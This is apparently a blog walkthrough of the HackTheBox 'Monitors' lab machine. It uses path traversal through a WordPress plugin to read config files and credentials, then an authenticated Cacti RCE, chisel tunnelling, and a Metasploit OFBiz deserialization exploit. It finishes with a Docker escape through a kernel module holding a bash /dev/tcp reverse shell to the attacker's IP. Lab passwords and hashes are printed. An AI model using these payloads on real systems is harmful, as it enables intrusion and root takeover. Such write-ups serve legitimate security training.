This page looks best with JavaScript enabled

HackTheBox: Monitors

 ·  ☕ 12 min read

Foothold:

Started by enumerating ports:

[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,80
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 14
         Nmap: 9
         Total: 23

So let’s have a look to what the page has:
Web interface

From that we know that is running wordpress and there is a user named admin, so used wpscan to check the site:

[jusepe@nix:~/Documents/HackTheBox/Machines/Monitors]$ wpscan --url http://monitors.htb
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://monitors.htb/ [10.10.10.238]
[+] Started: Sat May  1 04:35:29 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://monitors.htb/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://monitors.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://monitors.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://monitors.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://monitors.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://monitors.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: iconic-one
 | Location: http://monitors.htb/wp-content/themes/iconic-one/
 | Last Updated: 2020-12-24T00:00:00.000Z
 | Readme: http://monitors.htb/wp-content/themes/iconic-one/readme.txt
 | [!] The version is out of date, the latest version is 2.1.9
 | Style URL: http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8
 | Style Name: Iconic One
 | Style URI: https://themonic.com/iconic-one/
 | Description: Iconic One is a premium quality theme with pixel perfect typography and responsiveness and is built ...
 | Author: Themonic
 | Author URI: https://themonic.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8, Match: 'Version: 2.1.7'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <===============================================================================================================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat May  1 04:35:36 2021
[+] Requests Done: 188
[+] Cached Requests: 5
[+] Data Sent: 45.306 KB
[+] Data Received: 16.562 MB
[+] Memory used: 203.707 MB
[+] Elapsed time: 00:00:07

It is using the plugin wp-with-spritz which apparently was last updated on 2015, so may be vulnerable. A quick search in google points to an exploit:

Used panot

[jusepe@nix:~/Documents/HackTheBox/Machines/Monitors][0]$ panoptic.py -u "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd" --param url --os '*NIX'

 .-',--.`-.
<_ | () | _>
  `-`=='-'

Panoptic v0.1 (https://github.com/lightos/Panoptic/)

[i] Starting scan at: 11:40:47

[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[i] Possible file(s) found!
[i] OS: *NIX
[+] Found '/etc/mysql/my.cnf' (*NIX/Databases/conf).
[+] Found '/etc/apache2/apache2.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/ports.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/envvars' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/autoindex.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/deflate.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/dir.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/mime.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/proxy.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/setenvif.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-available/ssl.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/alias.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/deflate.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/dir.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/mime.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/negotiation.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/apache2/mods-enabled/status.conf' (*NIX/HTTP server/conf).
[+] Found '/etc/dhcp/dhclient.conf' (*NIX/Network/conf).
[+] Found '/proc/self/mounts' (*NIX/other).
[+] Found '/proc/self/stat' (*NIX/other).
[+] Found '/proc/self/status' (*NIX/other).
[+] Found '/proc/self/cmdline' (*NIX/other).
[+] Found '/proc/self/fd/10' (*NIX/other).

Ended up not showing any useful file except for /proc/self/fd/10 which shows some logs, but coulnd’t figure out how to use them.

Kept trying with manual enumeration and found two interesting files:

  • Apache default site configuration (monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/000-default.conf) which points to a different configuration file (monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/cacti-admin.monitors.htb.conf) this lead to the virtual host of a different web service (cacti-admin.monitors.htb)
  • Wordpress configuration file (monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/wordpress/wp-config.php), it has the database username and password in it (wpadmin:BestAdministrator@2020!)

Before anything else tried to log in with the credentials in wordpress but didn’t work.

Then checked what is inside the new VHOST:
Cacti

Apparently it is using cacti CMS, which seems to have some vulnerabilities according to exploitdb:

[jusepe@nix:~/Documents/HackTheBox/Machines/Monitors][0]$ searchsploit cacti
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Cacti - 'graph_view.php' Remote Command Execution (Metasploit)                     | php/webapps/16881.rb
Cacti 0.8.6-d - 'graph_view.php' Command Injection (Metasploit)                    | php/webapps/9911.rb
Cacti 0.8.6d - Remote Command Execution                                            | php/webapps/1062.pl
Cacti 0.8.6i - 'cmd.php?popen()' Remote Injection                                  | php/webapps/3029.php
Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin                    | php/webapps/3045.php
Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php?Filter' Cro | php/webapps/34504.txt
Cacti 0.8.7 - '/index.php/sql.php?Login Action login_username' SQL Injection       | php/webapps/31161.txt
Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting                                | php/webapps/33000.txt
Cacti 0.8.7 - 'graph.php?view_type' Cross-Site Scripting                           | php/webapps/31157.txt
Cacti 0.8.7 - 'graph_view.php?filter' Cross-Site Scripting                         | php/webapps/31158.txt
Cacti 0.8.7 - 'graph_view.php?graph_list' SQL Injection                            | php/webapps/31156.txt
Cacti 0.8.7 - 'graph_xport.php?local_graph_id' SQL Injection                       | php/webapps/31160.txt
Cacti 0.8.7 - 'tree.php' Multiple SQL Injections                                   | php/webapps/31159.txt
Cacti 0.8.7e - Multiple Vulnerabilities                                            | php/webapps/10234.txt
Cacti 0.8.7e - OS Command Injection                                                | php/webapps/12339.txt
Cacti 0.8.7e - SQL Injection                                                       | php/webapps/12338.txt
Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities            | php/webapps/33374.txt
Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution                      | php/webapps/49810.py
Cacti 1.2.8 - Authenticated Remote Code Execution                                  | multiple/webapps/48144.py
Cacti 1.2.8 - Remote Code Execution                                                | php/webapps/48128.py
Cacti 1.2.8 - Unauthenticated Remote Code Execution                                | multiple/webapps/48145.py
Cacti Superlinks Plugin 1.4-2 - SQL Injection                                      | php/webapps/33809.txt
Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion               | php/webapps/35578.sh
Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)                  | php/webapps/48159.rb
RaXnet Cacti 0.5/0.6.x/0.8.x - 'Graph_Image.php' Remote Command Execution Variant  | php/webapps/25927.pl
RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion             | php/webapps/25857.txt
RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion            | php/webapps/25859.txt
RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection                          | php/webapps/24375.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

For that version there is an authenticated RCE, so tried to autenticate with the credentials that got from the wordpress configuration which worked just fine, only needed to change the username to admin (admin:BestAdministrator@2020!):

Used this exploit from github to get a shell.

That exploit is almost identical to the one on exploitdb. However the other one wasn’t working because wasn’t encoding the spaces

User

At first thought that I needed to crack the password for the wordpress user, here is how I got it (inside wordpress database):

mysql> select user_login,user_nicename, display_name,user_pass from wp_users;
+------------+---------------+--------------+------------------------------------+
| user_login | user_nicename | display_name | user_pass                          |
+------------+---------------+--------------+------------------------------------+
| admin      | admin         | admin        | $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 |
+------------+---------------+--------------+------------------------------------+
1 row in set (0.00 sec)

After some time using colabcat wasn’t able to break it, so this may be a rabbit hole.

Then you find another user and if you check his home directory there is an interesting script after guessing the file name(/home/marcus/.backup/backup.sh), which had the user credentials:

#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

This step isn’t necessary, in fact found the script after getting root without getting the user.

Root

Used netstat to check what ports are open, surprisingly port 8443 was open only for localhost, and is a port that is usually used on web services.

Used chisel to redirect the port to my local host using this guide

So the first step was to run chisel on my host:

./chisel server -p 9000 -reverse

Then on the target we redirect port 8443 to 8443 on our host:

./chisel client 10.10.15.193:9000 R:8443:127.0.0.1:8443

Remember to transfer the chisel binary

Now we can test if we have access to the service:
Apache

So used ffuf to check if there is any hidden directory and got some quick results that redirected me to the login endpoint:

[jusepe@nix:~][0]$ ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://127.0.0.1:8443/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : https://127.0.0.1:8443/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

images                  [Status: 302, Size: 0, Words: 1, Lines: 1]
content                 [Status: 302, Size: 0, Words: 1, Lines: 1]
common                  [Status: 302, Size: 0, Words: 1, Lines: 1]
catalog                 [Status: 302, Size: 0, Words: 1, Lines: 1]
marketing               [Status: 302, Size: 0, Words: 1, Lines: 1]
ecommerce               [Status: 302, Size: 0, Words: 1, Lines: 1]
ap                      [Status: 302, Size: 0, Words: 1, Lines: 1]

We get redirected to a login page (also displays 17.12.0.1 as the current release):

OFBiz

Searched as always if there is any available exploits

[jusepe@nix:~/Documents/HackTheBox/Machines/Monitors/CVE-2021-29200][1]$ searchsploit ofbiz
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Apache OFBiz - Admin Creator                                                        | multiple/remote/12264.txt
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities                        | php/webapps/12330.txt
Apache OFBiz - Remote Execution (via SQL Execution)                                 | multiple/remote/12263.txt
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities                 | multiple/remote/38230.txt
Apache OFBiz 16.11.04 - XML External Entity Injection                               | java/webapps/45673.py
Apache OFBiz 16.11.05 - Cross-Site Scripting                                        | multiple/webapps/45975.txt
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)               | java/webapps/48408.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

None of those worked so kept searching until tried out metasploit modules:

msf6 > search ofbiz

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank       Check  Description
   -  ----                                                  ---------------  ----       -----  -----------
   0  exploit/linux/http/apache_ofbiz_deserialization_soap  2021-03-22       excellent  Yes    Apache OFBiz SOAP Java Deserialization
   1  exploit/linux/http/apache_ofbiz_deserialization       2020-07-13       excellent  Yes    Apache OFBiz XML-RPC Java Deserialization


Interact with a module by name or index. For example info 1, use 1 or use exploit/linux/http/apache_ofbiz_deserialization

Used the first module since it was more recent but after some time trying didn’t manage to make it work.

Finally used exploit/linux/http/apache_ofbiz_deserialization to get the root shell:

This is how I configured the module:

msf6 exploit(linux/http/apache_ofbiz_deserialization) > show options

Module options (exploit/linux/http/apache_ofbiz_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
                                         n on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.15.193     yes       The local listener hostname
   LPORT  8181             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

For some reason it detects that isn’t vulnerable but if I force it the exploit works just fine

msf6 exploit(linux/http/apache_ofbiz_deserialization) > exploit

[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Target cannot deserialize arbitrary data. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.

Docker escape

We can know that we are in a docker container with the following commands:

(remote) root@fe5704311d80:/root# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
(remote) root@fe5704311d80:/root# cat /proc/1/cgroup
12:pids:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
11:net_cls,net_prio:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
10:blkio:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
9:rdma:/
8:memory:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
7:freezer:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
6:hugetlb:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
5:devices:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
4:cpuset:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
3:perf_event:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
2:cpu,cpuacct:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
1:name=systemd:/docker/fe5704311d80bf9e3eb1a004be499189a69288a25a885928d529369893cc147b
0::/system.slice/containerd.service

Found this first post that explains a way of escaping docker containers. However running ip link add dummy0 type dummy returns an error so this can’t be exploited this way.

After some time searching for other ways of breaking out of the container found this post. So following the steps of the guide, first we check that we have the needed capability:

(remote) root@fe5704311d80:/root# capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

Then we create a file reverse-shell.c with the content:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.15.193/1111 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit)

Also create a Makefile:

1
2
3
4
5
obj-m +=reverse-shell.o
all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Then we use make to create the module and add it with insmod reverse-shell.ko.

(remote) root@monitors:/# id 
uid=0(root) gid=0(root) groups=0(root)
(remote) root@monitors:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:54:94 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.238/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:5494/64 scope global dynamic mngtmpaddr 
       valid_lft 86113sec preferred_lft 14113sec
    inet6 fe80::250:56ff:feb9:5494/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:bc:36:1c:38 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:bcff:fe36:1c38/64 scope link 
       valid_lft forever preferred_lft forever
4: br-968a1c1855aa: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:c6:52:d5:1d brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-968a1c1855aa
       valid_lft forever preferred_lft forever
6: vetha3b47d7@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether ce:eb:34:55:03:df brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::cceb:34ff:fe55:3df/64 scope link 
       valid_lft forever preferred_lft forever
(remote) root@monitors:/# cat /etc/shadow | head -n 1
root:$6$vSJnzptH$pCoAuyngEc2pUm3Hos6qTNzopXdvnXACaAZEDAQU4VoBc19qxa9eASxv/EKnkTEOWWGyuPobtS/QA2kAFkrWP0:18577:0:99999:7:::
Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover